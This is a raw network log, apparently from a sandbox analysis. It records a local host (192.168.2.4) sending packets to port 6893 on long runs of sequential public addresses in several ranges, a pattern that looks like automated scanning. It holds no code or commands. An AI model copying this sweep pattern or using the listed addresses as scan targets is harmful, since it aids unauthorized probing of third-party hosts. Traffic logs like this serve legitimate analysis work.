                                                                                                        Sep 29, 2022 14:45:18.949526072 CEST585666893192.168.2.487.98.179.206
                                                                                                        Sep 29, 2022 14:45:18.949626923 CEST585666893192.168.2.487.98.179.207
                                                                                                        Sep 29, 2022 14:45:18.949709892 CEST585666893192.168.2.487.98.179.208
                                                                                                        Sep 29, 2022 14:45:18.949811935 CEST585666893192.168.2.487.98.179.209
                                                                                                        Sep 29, 2022 14:45:18.949934959 CEST585666893192.168.2.487.98.179.210
                                                                                                        Sep 29, 2022 14:45:18.950018883 CEST585666893192.168.2.487.98.179.211
                                                                                                        Sep 29, 2022 14:45:18.950093985 CEST585666893192.168.2.487.98.179.212
                                                                                                        Sep 29, 2022 14:45:18.950187922 CEST585666893192.168.2.487.98.179.213
                                                                                                        Sep 29, 2022 14:45:18.950320005 CEST585666893192.168.2.487.98.179.214
                                                                                                        Sep 29, 2022 14:45:18.950393915 CEST585666893192.168.2.487.98.179.215
                                                                                                        Sep 29, 2022 14:45:18.950493097 CEST585666893192.168.2.487.98.179.216
                                                                                                        Sep 29, 2022 14:45:18.950627089 CEST585666893192.168.2.487.98.179.217
                                                                                                        Sep 29, 2022 14:45:18.950773954 CEST585666893192.168.2.487.98.179.218
                                                                                                        Sep 29, 2022 14:45:18.950844049 CEST585666893192.168.2.487.98.179.219
                                                                                                        Sep 29, 2022 14:45:18.950917959 CEST585666893192.168.2.487.98.179.220
                                                                                                        Sep 29, 2022 14:45:18.951052904 CEST585666893192.168.2.487.98.179.221
                                                                                                        Sep 29, 2022 14:45:18.951318026 CEST585666893192.168.2.487.98.179.222
                                                                                                        Sep 29, 2022 14:45:18.951489925 CEST585666893192.168.2.487.98.179.223
                                                                                                        Sep 29, 2022 14:45:18.951690912 CEST585666893192.168.2.487.98.179.224
                                                                                                        Sep 29, 2022 14:45:18.951822042 CEST585666893192.168.2.487.98.179.225
                                                                                                        Sep 29, 2022 14:45:18.952002048 CEST585666893192.168.2.487.98.179.226
                                                                                                        Sep 29, 2022 14:45:18.952105999 CEST585666893192.168.2.487.98.179.227
                                                                                                        Sep 29, 2022 14:45:18.952331066 CEST585666893192.168.2.487.98.179.229
                                                                                                        Sep 29, 2022 14:45:18.952485085 CEST585666893192.168.2.487.98.179.230
                                                                                                        Sep 29, 2022 14:45:18.952723026 CEST585666893192.168.2.487.98.179.231
                                                                                                        Sep 29, 2022 14:45:18.952723026 CEST585666893192.168.2.487.98.179.232
                                                                                                        Sep 29, 2022 14:45:18.952838898 CEST585666893192.168.2.487.98.179.233
                                                                                                        Sep 29, 2022 14:45:18.952934980 CEST585666893192.168.2.487.98.179.228
                                                                                                        Sep 29, 2022 14:45:18.952999115 CEST585666893192.168.2.487.98.179.234
                                                                                                        Sep 29, 2022 14:45:18.953228951 CEST585666893192.168.2.487.98.179.235
                                                                                                        Sep 29, 2022 14:45:18.953258991 CEST585666893192.168.2.487.98.179.236
                                                                                                        Sep 29, 2022 14:45:18.953373909 CEST585666893192.168.2.487.98.179.237
                                                                                                        Sep 29, 2022 14:45:18.953464031 CEST585666893192.168.2.487.98.179.238
                                                                                                        Sep 29, 2022 14:45:18.953562975 CEST585666893192.168.2.487.98.179.239
                                                                                                        Sep 29, 2022 14:45:18.953675985 CEST585666893192.168.2.487.98.179.240
                                                                                                        Sep 29, 2022 14:45:18.953783989 CEST585666893192.168.2.487.98.179.241
                                                                                                        Sep 29, 2022 14:45:18.953864098 CEST585666893192.168.2.487.98.179.242
                                                                                                        Sep 29, 2022 14:45:18.953948975 CEST585666893192.168.2.487.98.179.243
                                                                                                        Sep 29, 2022 14:45:18.954039097 CEST585666893192.168.2.487.98.179.244
                                                                                                        Sep 29, 2022 14:45:18.954210043 CEST585666893192.168.2.487.98.179.246
                                                                                                        Sep 29, 2022 14:45:18.954296112 CEST585666893192.168.2.487.98.179.247
                                                                                                        Sep 29, 2022 14:45:18.954375982 CEST585666893192.168.2.487.98.179.248
                                                                                                        Sep 29, 2022 14:45:18.954626083 CEST585666893192.168.2.487.98.179.251
                                                                                                        Sep 29, 2022 14:45:18.954706907 CEST585666893192.168.2.487.98.179.252
                                                                                                        Sep 29, 2022 14:45:18.954730034 CEST585666893192.168.2.487.98.179.249
                                                                                                        Sep 29, 2022 14:45:18.954735994 CEST585666893192.168.2.487.98.179.245
                                                                                                        Sep 29, 2022 14:45:18.954735994 CEST585666893192.168.2.487.98.179.250
                                                                                                        Sep 29, 2022 14:45:18.954799891 CEST585666893192.168.2.487.98.179.253
                                                                                                        Sep 29, 2022 14:45:18.954885006 CEST585666893192.168.2.487.98.179.254
                                                                                                        Sep 29, 2022 14:45:19.503637075 CEST59684274192.168.2.4192.168.2.1
                                                                                                        Sep 29, 2022 14:45:19.505400896 CEST59684274192.168.2.4192.168.2.1
                                                                                                        Sep 29, 2022 14:45:19.989214897 CEST585666893192.168.2.487.98.179.255
                                                                                                        Sep 29, 2022 14:45:21.755588055 CEST585676893192.168.2.493.107.12.0
                                                                                                        Sep 29, 2022 14:45:21.755678892 CEST585676893192.168.2.493.107.12.1
                                                                                                        Sep 29, 2022 14:45:21.755759954 CEST585676893192.168.2.493.107.12.2
                                                                                                        Sep 29, 2022 14:45:21.755831957 CEST585676893192.168.2.493.107.12.3
                                                                                                        Sep 29, 2022 14:45:21.755886078 CEST585676893192.168.2.493.107.12.4
                                                                                                        Sep 29, 2022 14:45:21.755955935 CEST585676893192.168.2.493.107.12.5
                                                                                                        Sep 29, 2022 14:45:21.756032944 CEST585676893192.168.2.493.107.12.6
                                                                                                        Sep 29, 2022 14:45:21.756117105 CEST585676893192.168.2.493.107.12.7
                                                                                                        Sep 29, 2022 14:45:21.756262064 CEST585676893192.168.2.493.107.12.9
                                                                                                        Sep 29, 2022 14:45:21.756321907 CEST585676893192.168.2.493.107.12.10
                                                                                                        Sep 29, 2022 14:45:21.756392956 CEST585676893192.168.2.493.107.12.11
                                                                                                        Sep 29, 2022 14:45:21.756473064 CEST585676893192.168.2.493.107.12.12
                                                                                                        Sep 29, 2022 14:45:21.756537914 CEST585676893192.168.2.493.107.12.13
                                                                                                        Sep 29, 2022 14:45:21.756552935 CEST585676893192.168.2.493.107.12.8
                                                                                                        Sep 29, 2022 14:45:21.756613016 CEST585676893192.168.2.493.107.12.14
                                                                                                        Sep 29, 2022 14:45:21.756714106 CEST585676893192.168.2.493.107.12.15
                                                                                                        Sep 29, 2022 14:45:21.756974936 CEST585676893192.168.2.493.107.12.16
                                                                                                        Sep 29, 2022 14:45:21.757142067 CEST585676893192.168.2.493.107.12.17
                                                                                                        Sep 29, 2022 14:45:21.757483006 CEST585676893192.168.2.493.107.12.18
                                                                                                        Sep 29, 2022 14:45:21.757745028 CEST585676893192.168.2.493.107.12.19
                                                                                                        Sep 29, 2022 14:45:21.757865906 CEST585676893192.168.2.493.107.12.20
                                                                                                        Sep 29, 2022 14:45:21.757958889 CEST585676893192.168.2.493.107.12.21
                                                                                                        Sep 29, 2022 14:45:21.758269072 CEST585676893192.168.2.493.107.12.23
                                                                                                        Sep 29, 2022 14:45:21.758347988 CEST585676893192.168.2.493.107.12.24
                                                                                                        Sep 29, 2022 14:45:21.758450031 CEST585676893192.168.2.493.107.12.22
                                                                                                        Sep 29, 2022 14:45:21.758820057 CEST585676893192.168.2.493.107.12.25
                                                                                                        Sep 29, 2022 14:45:21.759527922 CEST585676893192.168.2.493.107.12.26
                                                                                                        Sep 29, 2022 14:45:21.759673119 CEST585676893192.168.2.493.107.12.27
                                                                                                        Sep 29, 2022 14:45:21.759799004 CEST585676893192.168.2.493.107.12.28
                                                                                                        Sep 29, 2022 14:45:21.759984970 CEST585676893192.168.2.493.107.12.29
                                                                                                        Sep 29, 2022 14:45:21.760082006 CEST585676893192.168.2.493.107.12.30
                                                                                                        Sep 29, 2022 14:45:21.760251045 CEST585676893192.168.2.493.107.12.31
                                                                                                        Sep 29, 2022 14:45:21.760448933 CEST585676893192.168.2.495.1.200.0
                                                                                                        Sep 29, 2022 14:45:21.760569096 CEST585676893192.168.2.495.1.200.1
                                                                                                        Sep 29, 2022 14:45:21.760709047 CEST585676893192.168.2.495.1.200.2
                                                                                                        Sep 29, 2022 14:45:21.761291027 CEST585676893192.168.2.495.1.200.4
                                                                                                        Sep 29, 2022 14:45:21.761377096 CEST585676893192.168.2.495.1.200.5
                                                                                                        Sep 29, 2022 14:45:21.761446953 CEST585676893192.168.2.495.1.200.6
                                                                                                        Sep 29, 2022 14:45:21.761668921 CEST585676893192.168.2.495.1.200.9
                                                                                                        Sep 29, 2022 14:45:21.761743069 CEST585676893192.168.2.495.1.200.10
                                                                                                        Sep 29, 2022 14:45:21.761811018 CEST585676893192.168.2.495.1.200.11
                                                                                                        Sep 29, 2022 14:45:21.761821985 CEST585676893192.168.2.495.1.200.7
                                                                                                        Sep 29, 2022 14:45:21.761822939 CEST585676893192.168.2.495.1.200.8
                                                                                                        Sep 29, 2022 14:45:21.761861086 CEST585676893192.168.2.495.1.200.3
                                                                                                        Sep 29, 2022 14:45:21.762021065 CEST585676893192.168.2.495.1.200.13
                                                                                                        Sep 29, 2022 14:45:21.762047052 CEST585676893192.168.2.495.1.200.12
                                                                                                        Sep 29, 2022 14:45:21.762125969 CEST585676893192.168.2.495.1.200.14
                                                                                                        Sep 29, 2022 14:45:21.762202978 CEST585676893192.168.2.495.1.200.15
                                                                                                        Sep 29, 2022 14:45:21.762267113 CEST585676893192.168.2.495.1.200.16
                                                                                                        Sep 29, 2022 14:45:21.762335062 CEST585676893192.168.2.495.1.200.17
                                                                                                        Sep 29, 2022 14:45:21.762510061 CEST585676893192.168.2.495.1.200.19
                                                                                                        Sep 29, 2022 14:45:21.762571096 CEST585676893192.168.2.495.1.200.18
                                                                                                        Sep 29, 2022 14:45:21.762814999 CEST585676893192.168.2.495.1.200.20
                                                                                                        Sep 29, 2022 14:45:21.762887001 CEST585676893192.168.2.495.1.200.21
                                                                                                        Sep 29, 2022 14:45:21.762975931 CEST585676893192.168.2.495.1.200.22
                                                                                                        Sep 29, 2022 14:45:21.763036966 CEST585676893192.168.2.495.1.200.23
                                                                                                        Sep 29, 2022 14:45:21.763108969 CEST585676893192.168.2.495.1.200.24
                                                                                                        Sep 29, 2022 14:45:21.763180017 CEST585676893192.168.2.495.1.200.25
                                                                                                        Sep 29, 2022 14:45:21.763243914 CEST585676893192.168.2.495.1.200.26
                                                                                                        Sep 29, 2022 14:45:21.763334990 CEST585676893192.168.2.495.1.200.27
                                                                                                        Sep 29, 2022 14:45:21.763403893 CEST585676893192.168.2.495.1.200.28
                                                                                                        Sep 29, 2022 14:45:21.763510942 CEST585676893192.168.2.495.1.200.29
                                                                                                        Sep 29, 2022 14:45:21.763642073 CEST585676893192.168.2.495.1.200.30
                                                                                                        Sep 29, 2022 14:45:21.763798952 CEST585676893192.168.2.495.1.200.31
                                                                                                        Sep 29, 2022 14:45:21.764020920 CEST585676893192.168.2.487.98.176.1
                                                                                                        Sep 29, 2022 14:45:21.764065027 CEST585676893192.168.2.487.98.176.0
                                                                                                        Sep 29, 2022 14:45:21.764098883 CEST585676893192.168.2.487.98.176.2
                                                                                                        Sep 29, 2022 14:45:21.764183044 CEST585676893192.168.2.487.98.176.3
                                                                                                        Sep 29, 2022 14:45:21.764297009 CEST585676893192.168.2.487.98.176.4
                                                                                                        Sep 29, 2022 14:45:21.764364004 CEST585676893192.168.2.487.98.176.5
                                                                                                        Sep 29, 2022 14:45:21.765284061 CEST585676893192.168.2.487.98.176.6
                                                                                                        Sep 29, 2022 14:45:21.765412092 CEST585676893192.168.2.487.98.176.7
                                                                                                        Sep 29, 2022 14:45:21.765571117 CEST585676893192.168.2.487.98.176.8
                                                                                                        Sep 29, 2022 14:45:21.765713930 CEST585676893192.168.2.487.98.176.9
                                                                                                        Sep 29, 2022 14:45:21.765822887 CEST585676893192.168.2.487.98.176.10
                                                                                                        Sep 29, 2022 14:45:21.766866922 CEST585676893192.168.2.487.98.176.11
                                                                                                        Sep 29, 2022 14:45:21.766982079 CEST585676893192.168.2.487.98.176.12
                                                                                                        Sep 29, 2022 14:45:21.767122984 CEST585676893192.168.2.487.98.176.13
                                                                                                        Sep 29, 2022 14:45:21.767246008 CEST585676893192.168.2.487.98.176.14
                                                                                                        Sep 29, 2022 14:45:21.767376900 CEST585676893192.168.2.487.98.176.16
                                                                                                        Sep 29, 2022 14:45:21.767472982 CEST585676893192.168.2.487.98.176.15
                                                                                                        Sep 29, 2022 14:45:21.767472982 CEST585676893192.168.2.487.98.176.17
                                                                                                        Sep 29, 2022 14:45:21.767543077 CEST585676893192.168.2.487.98.176.18
                                                                                                        Sep 29, 2022 14:45:21.767631054 CEST585676893192.168.2.487.98.176.19
                                                                                                        Sep 29, 2022 14:45:21.767872095 CEST585676893192.168.2.487.98.176.20
                                                                                                        Sep 29, 2022 14:45:21.768188000 CEST585676893192.168.2.487.98.176.22
                                                                                                        Sep 29, 2022 14:45:21.768212080 CEST585676893192.168.2.487.98.176.21
                                                                                                        Sep 29, 2022 14:45:21.768332958 CEST585676893192.168.2.487.98.176.23
                                                                                                        Sep 29, 2022 14:45:21.768376112 CEST585676893192.168.2.487.98.176.24
                                                                                                        Sep 29, 2022 14:45:21.768455029 CEST585676893192.168.2.487.98.176.25
                                                                                                        Sep 29, 2022 14:45:21.768650055 CEST585676893192.168.2.487.98.176.26
                                                                                                        Sep 29, 2022 14:45:21.768735886 CEST585676893192.168.2.487.98.176.27
                                                                                                        Sep 29, 2022 14:45:21.768872976 CEST585676893192.168.2.487.98.176.28
                                                                                                        Sep 29, 2022 14:45:21.769012928 CEST585676893192.168.2.487.98.176.29
                                                                                                        Sep 29, 2022 14:45:21.769149065 CEST585676893192.168.2.487.98.176.30
                                                                                                        Sep 29, 2022 14:45:21.769198895 CEST585676893192.168.2.487.98.176.31
                                                                                                        Sep 29, 2022 14:45:21.769345045 CEST585676893192.168.2.487.98.176.33
                                                                                                        Sep 29, 2022 14:45:21.769431114 CEST585676893192.168.2.487.98.176.34
                                                                                                        Sep 29, 2022 14:45:21.769535065 CEST585676893192.168.2.487.98.176.32
                                                                                                        Sep 29, 2022 14:45:21.769541025 CEST585676893192.168.2.487.98.176.35
                                                                                                        Sep 29, 2022 14:45:21.769654989 CEST585676893192.168.2.487.98.176.36
                                                                                                        Sep 29, 2022 14:45:21.769861937 CEST585676893192.168.2.487.98.176.37
                                                                                                        Sep 29, 2022 14:45:21.770060062 CEST585676893192.168.2.487.98.176.38
                                                                                                        Sep 29, 2022 14:45:21.770170927 CEST585676893192.168.2.487.98.176.39
                                                                                                        Sep 29, 2022 14:45:21.770262957 CEST585676893192.168.2.487.98.176.40
                                                                                                        Sep 29, 2022 14:45:21.770376921 CEST585676893192.168.2.487.98.176.41
                                                                                                        Sep 29, 2022 14:45:21.770483017 CEST585676893192.168.2.487.98.176.42
                                                                                                        Sep 29, 2022 14:45:21.770673037 CEST585676893192.168.2.487.98.176.43
                                                                                                        Sep 29, 2022 14:45:21.770827055 CEST585676893192.168.2.487.98.176.44
                                                                                                        Sep 29, 2022 14:45:21.770916939 CEST585676893192.168.2.487.98.176.45
                                                                                                        Sep 29, 2022 14:45:21.771022081 CEST585676893192.168.2.487.98.176.46
                                                                                                        Sep 29, 2022 14:45:21.771213055 CEST585676893192.168.2.487.98.176.48
                                                                                                        Sep 29, 2022 14:45:21.771306038 CEST585676893192.168.2.487.98.176.47
                                                                                                        Sep 29, 2022 14:45:21.771306038 CEST585676893192.168.2.487.98.176.49
                                                                                                        Sep 29, 2022 14:45:21.771416903 CEST585676893192.168.2.487.98.176.50
                                                                                                        Sep 29, 2022 14:45:21.771508932 CEST585676893192.168.2.487.98.176.51
                                                                                                        Sep 29, 2022 14:45:21.771615982 CEST585676893192.168.2.487.98.176.52
                                                                                                        Sep 29, 2022 14:45:21.771728039 CEST585676893192.168.2.487.98.176.53
                                                                                                        Sep 29, 2022 14:45:21.771832943 CEST585676893192.168.2.487.98.176.54
                                                                                                        Sep 29, 2022 14:45:21.771949053 CEST585676893192.168.2.487.98.176.55
                                                                                                        Sep 29, 2022 14:45:21.772025108 CEST585676893192.168.2.487.98.176.56
                                                                                                        Sep 29, 2022 14:45:21.772160053 CEST585676893192.168.2.487.98.176.57
                                                                                                        Sep 29, 2022 14:45:21.772300005 CEST585676893192.168.2.487.98.176.58
                                                                                                        Sep 29, 2022 14:45:21.772453070 CEST585676893192.168.2.487.98.176.59
                                                                                                        Sep 29, 2022 14:45:21.772552967 CEST585676893192.168.2.487.98.176.60
                                                                                                        Sep 29, 2022 14:45:21.772665977 CEST585676893192.168.2.487.98.176.61
                                                                                                        Sep 29, 2022 14:45:21.772782087 CEST585676893192.168.2.487.98.176.62
                                                                                                        Sep 29, 2022 14:45:21.772938013 CEST585676893192.168.2.487.98.176.63
                                                                                                        Sep 29, 2022 14:45:21.773056984 CEST585676893192.168.2.487.98.176.65
                                                                                                        Sep 29, 2022 14:45:21.773132086 CEST585676893192.168.2.487.98.176.66
                                                                                                        Sep 29, 2022 14:45:21.773188114 CEST585676893192.168.2.487.98.176.64
                                                                                                        Sep 29, 2022 14:45:21.773263931 CEST585676893192.168.2.487.98.176.67
                                                                                                        Sep 29, 2022 14:45:21.773413897 CEST585676893192.168.2.487.98.176.68
                                                                                                        Sep 29, 2022 14:45:21.773586988 CEST585676893192.168.2.487.98.176.69
                                                                                                        Sep 29, 2022 14:45:21.773667097 CEST585676893192.168.2.487.98.176.70
                                                                                                        Sep 29, 2022 14:45:21.773763895 CEST585676893192.168.2.487.98.176.71
                                                                                                        Sep 29, 2022 14:45:21.773859978 CEST585676893192.168.2.487.98.176.72
                                                                                                        Sep 29, 2022 14:45:21.773962021 CEST585676893192.168.2.487.98.176.73
                                                                                                        Sep 29, 2022 14:45:21.774040937 CEST585676893192.168.2.487.98.176.74
                                                                                                        Sep 29, 2022 14:45:21.774127007 CEST585676893192.168.2.487.98.176.75
                                                                                                        Sep 29, 2022 14:45:21.774209976 CEST585676893192.168.2.487.98.176.76
                                                                                                        Sep 29, 2022 14:45:21.774348974 CEST585676893192.168.2.487.98.176.77
                                                                                                        Sep 29, 2022 14:45:21.774419069 CEST585676893192.168.2.487.98.176.78
                                                                                                        Sep 29, 2022 14:45:21.775527954 CEST585676893192.168.2.487.98.176.79
                                                                                                        Sep 29, 2022 14:45:21.775639057 CEST585676893192.168.2.487.98.176.80
                                                                                                        Sep 29, 2022 14:45:21.775760889 CEST585676893192.168.2.487.98.176.81
                                                                                                        Sep 29, 2022 14:45:21.775934935 CEST585676893192.168.2.487.98.176.82
                                                                                                        Sep 29, 2022 14:45:21.776088953 CEST585676893192.168.2.487.98.176.83
                                                                                                        Sep 29, 2022 14:45:21.776249886 CEST585676893192.168.2.487.98.176.84
                                                                                                        Sep 29, 2022 14:45:21.776282072 CEST585676893192.168.2.487.98.176.85
                                                                                                        Sep 29, 2022 14:45:21.776412964 CEST585676893192.168.2.487.98.176.86
                                                                                                        Sep 29, 2022 14:45:21.776601076 CEST585676893192.168.2.487.98.176.87
                                                                                                        Sep 29, 2022 14:45:21.776788950 CEST585676893192.168.2.487.98.176.88
                                                                                                        Sep 29, 2022 14:45:21.776925087 CEST585676893192.168.2.487.98.176.89
                                                                                                        Sep 29, 2022 14:45:21.777040005 CEST585676893192.168.2.487.98.176.90
                                                                                                        Sep 29, 2022 14:45:21.777151108 CEST585676893192.168.2.487.98.176.91
                                                                                                        Sep 29, 2022 14:45:21.777204990 CEST585676893192.168.2.487.98.176.92
                                                                                                        Sep 29, 2022 14:45:21.777303934 CEST585676893192.168.2.487.98.176.93
                                                                                                        Sep 29, 2022 14:45:21.777508974 CEST585676893192.168.2.487.98.176.94
                                                                                                        Sep 29, 2022 14:45:21.777609110 CEST585676893192.168.2.487.98.176.95
                                                                                                        Sep 29, 2022 14:45:21.777844906 CEST585676893192.168.2.487.98.176.97
                                                                                                        Sep 29, 2022 14:45:21.777920961 CEST585676893192.168.2.487.98.176.98
                                                                                                        Sep 29, 2022 14:45:21.778040886 CEST585676893192.168.2.487.98.176.99
                                                                                                        Sep 29, 2022 14:45:21.778106928 CEST585676893192.168.2.487.98.176.96
                                                                                                        Sep 29, 2022 14:45:21.778131962 CEST585676893192.168.2.487.98.176.100
                                                                                                        Sep 29, 2022 14:45:21.778244972 CEST585676893192.168.2.487.98.176.101
                                                                                                        Sep 29, 2022 14:45:21.778379917 CEST585676893192.168.2.487.98.176.102
                                                                                                        Sep 29, 2022 14:45:21.778516054 CEST585676893192.168.2.487.98.176.103
                                                                                                        Sep 29, 2022 14:45:21.778568983 CEST585676893192.168.2.487.98.176.104
                                                                                                        Sep 29, 2022 14:45:21.778672934 CEST585676893192.168.2.487.98.176.105
                                                                                                        Sep 29, 2022 14:45:21.778805017 CEST585676893192.168.2.487.98.176.106
                                                                                                        Sep 29, 2022 14:45:21.779028893 CEST585676893192.168.2.487.98.176.107
                                                                                                        Sep 29, 2022 14:45:21.779129028 CEST585676893192.168.2.487.98.176.108
                                                                                                        Sep 29, 2022 14:45:21.779244900 CEST585676893192.168.2.487.98.176.109
                                                                                                        Sep 29, 2022 14:45:21.779340029 CEST585676893192.168.2.487.98.176.110
                                                                                                        Sep 29, 2022 14:45:21.779417992 CEST585676893192.168.2.487.98.176.111
                                                                                                        Sep 29, 2022 14:45:21.779525995 CEST585676893192.168.2.487.98.176.112
                                                                                                        Sep 29, 2022 14:45:21.779648066 CEST585676893192.168.2.487.98.176.114
                                                                                                        Sep 29, 2022 14:45:21.779767036 CEST585676893192.168.2.487.98.176.115
                                                                                                        Sep 29, 2022 14:45:21.779884100 CEST585676893192.168.2.487.98.176.116
                                                                                                        Sep 29, 2022 14:45:21.779932022 CEST585676893192.168.2.487.98.176.113
                                                                                                        Sep 29, 2022 14:45:21.779951096 CEST585676893192.168.2.487.98.176.117
                                                                                                        Sep 29, 2022 14:45:21.780131102 CEST585676893192.168.2.487.98.176.118
                                                                                                        Sep 29, 2022 14:45:21.780253887 CEST585676893192.168.2.487.98.176.119
                                                                                                        Sep 29, 2022 14:45:21.780329943 CEST585676893192.168.2.487.98.176.120
                                                                                                        Sep 29, 2022 14:45:21.780402899 CEST585676893192.168.2.487.98.176.121
                                                                                                        Sep 29, 2022 14:45:21.780469894 CEST585676893192.168.2.487.98.176.122
                                                                                                        Sep 29, 2022 14:45:21.780582905 CEST585676893192.168.2.487.98.176.123
                                                                                                        Sep 29, 2022 14:45:21.780661106 CEST585676893192.168.2.487.98.176.124
                                                                                                        Sep 29, 2022 14:45:21.780736923 CEST585676893192.168.2.487.98.176.125
                                                                                                        Sep 29, 2022 14:45:21.780819893 CEST585676893192.168.2.487.98.176.126
                                                                                                        Sep 29, 2022 14:45:21.781222105 CEST585676893192.168.2.487.98.176.127
                                                                                                        Sep 29, 2022 14:45:21.781322002 CEST585676893192.168.2.487.98.176.128
                                                                                                        Sep 29, 2022 14:45:21.781429052 CEST585676893192.168.2.487.98.176.129
                                                                                                        Sep 29, 2022 14:45:21.781533003 CEST585676893192.168.2.487.98.176.130
                                                                                                        Sep 29, 2022 14:45:21.781613111 CEST585676893192.168.2.487.98.176.131
                                                                                                        Sep 29, 2022 14:45:21.781805038 CEST585676893192.168.2.487.98.176.132
                                                                                                        Sep 29, 2022 14:45:21.781943083 CEST585676893192.168.2.487.98.176.133
                                                                                                        Sep 29, 2022 14:45:21.782032967 CEST585676893192.168.2.487.98.176.134
                                                                                                        Sep 29, 2022 14:45:21.782187939 CEST585676893192.168.2.487.98.176.135
                                                                                                        Sep 29, 2022 14:45:21.782279968 CEST585676893192.168.2.487.98.176.136
                                                                                                        Sep 29, 2022 14:45:21.782361984 CEST585676893192.168.2.487.98.176.137
                                                                                                        Sep 29, 2022 14:45:21.782473087 CEST585676893192.168.2.487.98.176.138
                                                                                                        Sep 29, 2022 14:45:21.782563925 CEST585676893192.168.2.487.98.176.139
                                                                                                        Sep 29, 2022 14:45:21.782660961 CEST585676893192.168.2.487.98.176.140
                                                                                                        Sep 29, 2022 14:45:21.782743931 CEST585676893192.168.2.487.98.176.141
                                                                                                        Sep 29, 2022 14:45:21.782845020 CEST585676893192.168.2.487.98.176.142
                                                                                                        Sep 29, 2022 14:45:21.782968044 CEST585676893192.168.2.487.98.176.143
                                                                                                        Sep 29, 2022 14:45:21.783047915 CEST585676893192.168.2.487.98.176.144
                                                                                                        Sep 29, 2022 14:45:21.783159971 CEST585676893192.168.2.487.98.176.145
                                                                                                        Sep 29, 2022 14:45:21.783304930 CEST585676893192.168.2.487.98.176.146
                                                                                                        Sep 29, 2022 14:45:21.783497095 CEST585676893192.168.2.487.98.176.148
                                                                                                        Sep 29, 2022 14:45:21.783592939 CEST585676893192.168.2.487.98.176.149
                                                                                                        Sep 29, 2022 14:45:21.783689022 CEST585676893192.168.2.487.98.176.150
                                                                                                        Sep 29, 2022 14:45:21.783782959 CEST585676893192.168.2.487.98.176.151
                                                                                                        Sep 29, 2022 14:45:21.783804893 CEST585676893192.168.2.487.98.176.147
                                                                                                        Sep 29, 2022 14:45:21.783962011 CEST585676893192.168.2.487.98.176.152
                                                                                                        Sep 29, 2022 14:45:21.784123898 CEST585676893192.168.2.487.98.176.153
                                                                                                        Sep 29, 2022 14:45:21.784233093 CEST585676893192.168.2.487.98.176.154
                                                                                                        Sep 29, 2022 14:45:21.784306049 CEST585676893192.168.2.487.98.176.155
                                                                                                        Sep 29, 2022 14:45:21.784383059 CEST585676893192.168.2.487.98.176.156
                                                                                                        Sep 29, 2022 14:45:21.784468889 CEST585676893192.168.2.487.98.176.157
                                                                                                        Sep 29, 2022 14:45:21.784574032 CEST585676893192.168.2.487.98.176.158
                                                                                                        Sep 29, 2022 14:45:21.784672976 CEST585676893192.168.2.487.98.176.159
                                                                                                        Sep 29, 2022 14:45:21.784737110 CEST585676893192.168.2.487.98.176.160
                                                                                                        Sep 29, 2022 14:45:21.784811974 CEST585676893192.168.2.487.98.176.161
                                                                                                        Sep 29, 2022 14:45:21.784990072 CEST585676893192.168.2.487.98.176.163
                                                                                                        Sep 29, 2022 14:45:21.785043001 CEST585676893192.168.2.487.98.176.162
                                                                                                        Sep 29, 2022 14:45:21.785157919 CEST585676893192.168.2.487.98.176.164
                                                                                                        Sep 29, 2022 14:45:21.785221100 CEST585676893192.168.2.487.98.176.165
                                                                                                        Sep 29, 2022 14:45:21.785414934 CEST585676893192.168.2.487.98.176.166
                                                                                                        Sep 29, 2022 14:45:21.785554886 CEST585676893192.168.2.487.98.176.167
                                                                                                        Sep 29, 2022 14:45:21.785615921 CEST585676893192.168.2.487.98.176.168
                                                                                                        Sep 29, 2022 14:45:21.786160946 CEST585676893192.168.2.487.98.176.169
                                                                                                        Sep 29, 2022 14:45:21.786366940 CEST585676893192.168.2.487.98.176.170
                                                                                                        Sep 29, 2022 14:45:21.786480904 CEST585676893192.168.2.487.98.176.171
                                                                                                        Sep 29, 2022 14:45:21.786596060 CEST585676893192.168.2.487.98.176.172
                                                                                                        Sep 29, 2022 14:45:21.786695957 CEST585676893192.168.2.487.98.176.173
                                                                                                        Sep 29, 2022 14:45:21.786740065 CEST585676893192.168.2.487.98.176.174
                                                                                                        Sep 29, 2022 14:45:21.786819935 CEST585676893192.168.2.487.98.176.175
                                                                                                        Sep 29, 2022 14:45:21.786937952 CEST585676893192.168.2.487.98.176.176
                                                                                                        Sep 29, 2022 14:45:21.787121058 CEST585676893192.168.2.487.98.176.177
                                                                                                        Sep 29, 2022 14:45:21.787216902 CEST585676893192.168.2.487.98.176.178
                                                                                                        Sep 29, 2022 14:45:21.787458897 CEST585676893192.168.2.487.98.176.179
                                                                                                        Sep 29, 2022 14:45:21.787461042 CEST585676893192.168.2.487.98.176.180
                                                                                                        Sep 29, 2022 14:45:21.787581921 CEST585676893192.168.2.487.98.176.181
                                                                                                        Sep 29, 2022 14:45:21.787688971 CEST585676893192.168.2.487.98.176.182
                                                                                                        Sep 29, 2022 14:45:21.787797928 CEST585676893192.168.2.487.98.176.183
                                                                                                        Sep 29, 2022 14:45:21.787838936 CEST585676893192.168.2.487.98.176.184
                                                                                                        Sep 29, 2022 14:45:21.788029909 CEST585676893192.168.2.487.98.176.185
                                                                                                        Sep 29, 2022 14:45:21.788074017 CEST585676893192.168.2.487.98.176.186
                                                                                                        Sep 29, 2022 14:45:21.788149118 CEST585676893192.168.2.487.98.176.187
                                                                                                        Sep 29, 2022 14:45:21.788353920 CEST585676893192.168.2.487.98.176.189
                                                                                                        Sep 29, 2022 14:45:21.788382053 CEST585676893192.168.2.487.98.176.188
                                                                                                        Sep 29, 2022 14:45:21.788501024 CEST585676893192.168.2.487.98.176.190
                                                                                                        Sep 29, 2022 14:45:21.788613081 CEST585676893192.168.2.487.98.176.191
                                                                                                        Sep 29, 2022 14:45:21.788752079 CEST585676893192.168.2.487.98.176.192
                                                                                                        Sep 29, 2022 14:45:21.788856983 CEST585676893192.168.2.487.98.176.193
                                                                                                        Sep 29, 2022 14:45:21.789040089 CEST585676893192.168.2.487.98.176.195
                                                                                                        Sep 29, 2022 14:45:21.789148092 CEST585676893192.168.2.487.98.176.196
                                                                                                        Sep 29, 2022 14:45:21.789226055 CEST585676893192.168.2.487.98.176.197
                                                                                                        Sep 29, 2022 14:45:21.789377928 CEST585676893192.168.2.487.98.176.198
                                                                                                        Sep 29, 2022 14:45:21.789465904 CEST585676893192.168.2.487.98.176.194
                                                                                                        Sep 29, 2022 14:45:21.789484978 CEST585676893192.168.2.487.98.176.199
                                                                                                        Sep 29, 2022 14:45:21.789597034 CEST585676893192.168.2.487.98.176.200
                                                                                                        Sep 29, 2022 14:45:21.789906025 CEST585676893192.168.2.487.98.176.201
                                                                                                        Sep 29, 2022 14:45:21.790016890 CEST585676893192.168.2.487.98.176.202
